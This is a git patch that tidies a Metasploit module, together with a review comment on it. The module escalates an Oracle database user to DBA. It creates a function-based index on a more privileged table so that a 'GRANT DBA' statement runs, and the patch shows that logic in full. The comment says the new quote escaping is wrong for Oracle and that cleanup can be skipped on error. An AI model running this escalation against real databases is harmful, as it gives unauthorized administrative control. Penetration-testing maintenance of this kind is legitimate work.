From d0f1f72426375b876c705d60764956949821a31a Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 10 Dec 2018 11:21:16 -0600 Subject: [PATCH] Clean up module --- .../admin/oracle/oracle_index_privesc.md | 7 --- .../admin/oracle/oracle_index_privesc.rb | 47 ++++++++++--------- 2 files changed, 24 insertions(+), 30 deletions(-) diff --git a/documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md b/documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md index ec0c092190..043cc246db 100644 --- a/documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md +++ b/documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md @@ -26,10 +26,3 @@ **TABLE** Table to create the index on. - -## Scenarios - -### Escalating an Oracle SQL account to database administrator privileges. - - ``` - ``` diff --git a/modules/auxiliary/admin/oracle/oracle_index_privesc.rb b/modules/auxiliary/admin/oracle/oracle_index_privesc.rb index ba752fb1ff..ab1e7afadb 100644 --- a/modules/auxiliary/admin/oracle/oracle_index_privesc.rb +++ b/modules/auxiliary/admin/oracle/oracle_index_privesc.rb @@ -9,9 +9,11 @@ class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Oracle DB Privilege Escalation via function-based index', + 'Name' => 'Oracle DB Privilege Escalation via Function-Based Index', 'Description' => %q{ - This module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. Credits to David Litchfield for publishing the technique. + This module will escalate an Oracle DB user to DBA by creating a + function-based index on a table owned by a more-privileged user. + Credits to David Litchfield for publishing the technique. }, 'Author' => [ 
@@ -25,11 +27,11 @@ class MetasploitModule < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 21 2015')) - register_options( - [ - OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), - OptString.new('TABLE', [ true, 'Table to create the index on.', "SYS.DUAL"]), - ]) + register_options( + [ + OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}" ]), + OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]), + ]) end def run 
@@ -37,52 +39,51 @@ class MetasploitModule < Msf::Auxiliary func_name = Rex::Text.rand_text_alpha(6..10) - create_function = " + create_function = <<-EOF CREATE OR REPLACE FUNCTION #{func_name} (FOO varchar) return varchar deterministic authid current_user is pragma autonomous_transaction; begin - execute immediate '#{datastore['SQL']}'; + execute immediate '#{datastore['SQL'].gsub("'", "\\\\'")}'; commit; return ''; end; - " + EOF index_name = Rex::Text.rand_text_alpha(6..10) param_value = Rex::Text.rand_text_alpha(2..6) - create_index = " - CREATE INDEX #{index_name} ON - #{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))" + create_index = "CREATE INDEX #{index_name} ON " \ + "#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))" trigger = "SELECT * FROM #{datastore['TABLE']}" clean_index = "drop index #{index_name}" clean_func = "drop function #{func_name}" - print_status("Running exploit...") + print_status('Running exploit...') begin print_status("Attempting to create function #{func_name}...") - print_status(create_function) prepare_exec(create_function) print_status("Attempting to create index #{index_name}...") - print_status(create_index) prepare_exec(create_index) - print_status("Querying to trigger function...") - print_status(trigger) + print_status('Querying to trigger function...') prepare_exec(trigger) - print_status("Cleaning up index...") - print_status(clean_index) + print_status('Cleaning up index...') prepare_exec(clean_index) - print_status("Cleaning up function...") - print_status(clean_func) + print_status('Cleaning up function...') prepare_exec(clean_func) - print_status("Exploit complete!") + print_status('Exploit complete!') rescue ::OCIError => e print_error("Error! #{e.message}") end end + def prepare_exec(query) + print_status(query) + super + end + end
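Review bot: The escaping added in `execute immediate '#{datastore['SQL'].gsub("'", "\\\\'")}'` turns each quote into `\'`, but Oracle string literals have no backslash escape and expect the quote to be doubled, so a SQL value containing a single quote still closes the literal early and the CREATE FUNCTION fails to compile; `datastore['SQL'].gsub("'", "''")` is the form Oracle accepts. Separately, the two drop statements sit in the same `begin` as the setup steps, so an `OCIError` raised while creating the index or running the trigger query skips them and leaves the randomly named function (and possibly the index) behind in the database under test. Moving the cleanup into an `ensure` clause, with each drop rescued on its own, would avoid that. The new `prepare_exec` override would also benefit from a one-line comment such as `# Print each statement before delegating to the inherited prepare_exec`. `run` begins above this hunk, so the start of the method is not visible here.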